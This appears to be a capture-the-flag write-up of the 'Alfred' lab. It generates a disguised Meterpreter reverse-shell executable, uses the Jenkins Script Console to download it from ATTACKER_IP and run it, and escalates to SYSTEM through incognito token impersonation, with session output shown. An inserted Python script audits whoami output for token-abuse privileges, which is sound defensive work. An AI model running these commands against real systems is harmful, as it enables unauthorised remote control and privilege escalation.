Alfred

MSFVENOM

  • Generate the payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=ATTACKER_IP LPORT=PORT -f exe -o Adobe.exe

Jenkins Console

  • Upload the payload to the target through the Jenkins Script Console (the Groovy snippet runs PowerShell on the Jenkins host):
"powershell (New-Object System.Net.WebClient).Downloadfile('http://ATTACKER_IP:PORT/Adobe.exe','Adobe.exe')".execute().text

  • Once the payload is on the host, execute it from the same Script Console:
"powershell -c Start-Process Adobe.exe".execute().text


Privilege Escalation

  • Catch the reverse shell launched from the Jenkins Script Console with Metasploit.
  • Module: exploit/multi/handler
  • PAYLOAD: windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Sending stage (175686 bytes) to 10.10.47.178
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 10.10.47.178:49211) at 2022-10-10 04:31:19 +0200
  • The session runs as the Jenkins service account, alfred\bruce:
meterpreter > getuid 
Server username: alfred\bruce
meterpreter > sysinfo
Computer : ALFRED
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows

Privileges

  • The account holds SeDebugPrivilege and SeImpersonatePrivilege.
  • Privileges are assigned to an account (directly, or inherited through group membership) and determine which sensitive actions the user is allowed to perform.
C:\Program Files (x86)\Jenkins> whoami /all

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
[..]
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
[..]
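The privileges table above is the thing a defender should be auditing on every CI service account. The following Python script is an added example, not part of the original writeup: it parses the PRIVILEGES INFORMATION section printed by `whoami /all` and flags privileges that let a process act under another account's token, so the Jenkins service can be moved to a dedicated low-privilege account. The sample table is constructed, and the watch-list (the two privileges shown above plus SeAssignPrimaryTokenPrivilege and SeTcbPrivilege) is an assumption.

```python
import re

# Constructed sample: the PRIVILEGES INFORMATION section as printed by `whoami /all`.
SAMPLE_WHOAMI = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Assumed watch-list: privileges that allow a process to act under another
# account's token. SeImpersonate and SeDebug are the two seen in the writeup.
TOKEN_ABUSE_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeTcbPrivilege",
}

# One table row: privilege name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text: str) -> dict:
    """Return {privilege_name: state} from the PRIVILEGES INFORMATION table."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_privileges(text: str) -> list:
    """Watch-listed privileges the account holds, in sorted order.

    A privilege reported as Disabled is still held by the token and can be
    enabled by the process itself, so it counts as held."""
    return sorted(p for p in parse_privileges(text) if p in TOKEN_ABUSE_PRIVILEGES)


if __name__ == "__main__":
    found = risky_privileges(SAMPLE_WHOAMI)
    if found:
        print("service account holds token-abuse privileges:", ", ".join(found))
    else:
        print("no token-abuse privileges found")
```

To audit a real host, run `whoami /all` in the context of the Jenkins service and feed its output to `risky_privileges`; any hit means the service account should be replaced with a dedicated account that lacks these privileges.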


Access Tokens

  • There are two types of access tokens:
  • [Primary access tokens] Associated with a user account and created at logon.
  • [Impersonation tokens] Let a process (or a thread within it) access resources using the security context of another user or client process.

  • Load the incognito extension.
  • Command: list_tokens -g
  • A BUILTIN\Administrators delegation token is available to this process.
meterpreter > load incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
[..]

Exploitation

  • Command: impersonate_token "BUILTIN\Administrators"
  • After impersonating the token, the session runs as NT AUTHORITY\SYSTEM:
meterpreter > impersonate_token "BUILTIN\Administrators"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM